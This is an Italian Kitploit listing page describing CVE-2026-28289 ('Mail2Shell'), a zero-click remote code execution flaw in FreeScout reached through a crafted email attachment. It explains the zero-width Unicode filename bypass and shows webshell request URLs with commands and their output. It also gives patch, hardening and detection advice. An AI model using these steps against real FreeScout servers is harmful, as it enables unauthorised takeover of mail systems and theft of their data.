Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-28289 — CVE-2026-28289 | Kitploit
Strumenti/GitHubGitHub/0xblackash/cve-2026-28289
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo PayloadSicurezza Email
GitHub0xblackash/cve-2026-28289

CVE-2026-28289

CVE-2026-28289

Vedi Repository
156 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2026-28289 — “Mail2Shell”

1772564185117

RCE zero-click non autenticata in FreeScout tramite bypass degli allegati email

Severity CVSS Affected Patched


📖 Panoramica

CVE-2026-28289, soprannominata Mail2Shell, è una vulnerabilità critica di Remote Code Execution (RCE) zero-click che colpisce FreeScout.

Un attaccante può inviare un'email appositamente predisposta a una casella di posta di FreeScout e ottenere accesso remoto alla shell del server sottostante — senza autenticazione e senza alcuna interazione da parte dell'utente.


🧠 Riepilogo della Vulnerabilità

Scarica lo strumento
CampoValore
CVE IDCVE-2026-28289
Severità🔴 Critica
CVSS10.0 (Massimo)
Vettore d'attaccoRemoto (Email)
Autenticazione richiesta❌ Nessuna
Interazione utente❌ Nessuna
ImpattoCompromissione totale del server

⚙️ Analisi Tecnica

📨 Passaggio 1 — Invio dell'Email Dannosa

L'attaccante invia un'email con un allegato appositamente predisposto.

🧩 Passaggio 2 — Bypass della Sanificazione del Nome File

FreeScout tenta di bloccare file pericolosi come .htaccess, ma l'attaccante:

  • Antepone un carattere Unicode a larghezza zero
  • Bypassa la validazione del nome file
  • Il file viene salvato come file server eseguibile valido

💣 Passaggio 3 — Esecuzione Remota

L'attaccante accede al file caricato tramite percorso web ed esegue comandi arbitrari.

Risultato:

root@kitploit:~
# Remote shell access achieved
whoami
www-data

✅ Se l'operazione riesce, ecco ESATTAMENTE cosa vedrai (passo dopo passo):

mail2shell

1. Nel tuo terminale (subito dopo aver eseguito lo script)

root@kitploit:~
✅ Email sent successfully! (Zero-Click RCE triggered)

Vedrai anche stampate le istruzioni per i passaggi successivi.

2. Quando esegui il comando find sul tuo server FreeScout via SSH

Restituirà immediatamente il percorso reale completo del file caricato, ad esempio:

root@kitploit:~
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt

(o una cartella simile con data/ora — questo conferma che FreeScout ha salvato automaticamente l'allegato).

3. La VERA prova del successo — nel tuo browser (questo è il momento in cui capisci di avere piena RCE)

Copia il percorso del passaggio 2 e apri questo URL:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami

Vedrai esattamente questo output (testo semplice):

root@kitploit:~
www-data

(O qualunque sia l'utente Apache/PHP sul tuo server — di solito www-data, apache o nobody).

Ora cambia il comando e aggiorna la pagina:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id

Vedrai:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

E per ls -la:

root@kitploit:~
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar  5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar  5 14:00 ..
-rw-r--r-- 1 www-data www-data   87 Mar  5 15:00 webshell.txt

Questo output appare direttamente nella pagina del browser (all'interno dei tag <pre> della webshell). Nessun errore, nessun codice sorgente PHP, nessun 404.

Questo significa che hai piena esecuzione remota di codice sul server — il bypass .htaccess + spazio a larghezza zero ha funzionato perfettamente e l'allegato email è stato elaborato senza alcuna interazione da parte dell'utente.


🎯 Perché è Pericoloso

  • ⚡ Sfruttamento zero-click
  • 🌐 Superficie d'attacco remota (email)
  • 🔓 Nessuna autenticazione richiesta
  • 🧨 Piena capacità RCE
  • 📂 Potenziale esfiltrazione di dati
  • 🔁 Movimento laterale all'interno delle reti interne

📦 Versioni Interessate

Tutte le versioni di FreeScout:

root@kitploit:~
<= 1.8.206

✅ Versione Corretta

Aggiorna immediatamente a:

root@kitploit:~
1.8.207 or later

🛡️ Passaggi di Mitigazione

1️⃣ Azione Immediata

  • Aggiorna FreeScout all'ultima versione

2️⃣ Rafforza il Web Server

  • Disabilita AllowOverride All nella configurazione di Apache
  • Limita l'esecuzione all'interno delle directory degli allegati

3️⃣ Monitora i Log

Cerca:

  • File .htaccess sospetti
  • Caricamenti di allegati insoliti
  • Tentativi di accesso diretto a /storage/attachments/

🔍 Suggerimenti per il Rilevamento

Gli indicatori di compromissione possono includere:

  • File .htaccess sconosciuti nelle cartelle degli allegati
  • Picchi di traffico in uscita
  • Web server che avvia processi shell
  • Richieste POST/GET sospette verso percorsi degli allegati

🧪 Proof-of-Concept (Concettuale)

root@kitploit:~
Email → Malicious Attachment (Unicode prefixed filename)
        ↓
Saved to predictable path
        ↓
Web-accessible execution
        ↓
Remote shell

📌 Vulnerabilità Correlata

Questo problema ha bypassato le protezioni aggiunte in:

  • CVE-2026-27636

Dimostrando una logica incompleta di sanificazione dei nomi file.


📊 Valutazione dell'Impatto

Area di rischioImpatto
Riservatezza🔴 Alto
Integrità🔴 Alto
Disponibilità🔴 Alto

🧩 Lezioni Apprese

  • La gestione di Unicode deve essere normalizzata prima della validazione
  • Non affidarsi esclusivamente al filtraggio dei nomi file
  • Le directory degli allegati non dovrebbero mai consentire l'esecuzione di codice
  • I vettori zero-click sono superfici d'attacco ad alto rischio

📚 Riferimenti

  • Advisory di Sicurezza di FreeScout
  • Voce NVD per CVE-2026-28289

🚨 Raccomandazione Finale

Se gestisci un'istanza self-hosted di FreeScout:

🔥 Applica subito la patch. 💡 Parti dal presupposto di essere compromessi se esegui versioni vulnerabili esposte a Internet. 🛡 Esegui una revisione dei log e controlli di integrità.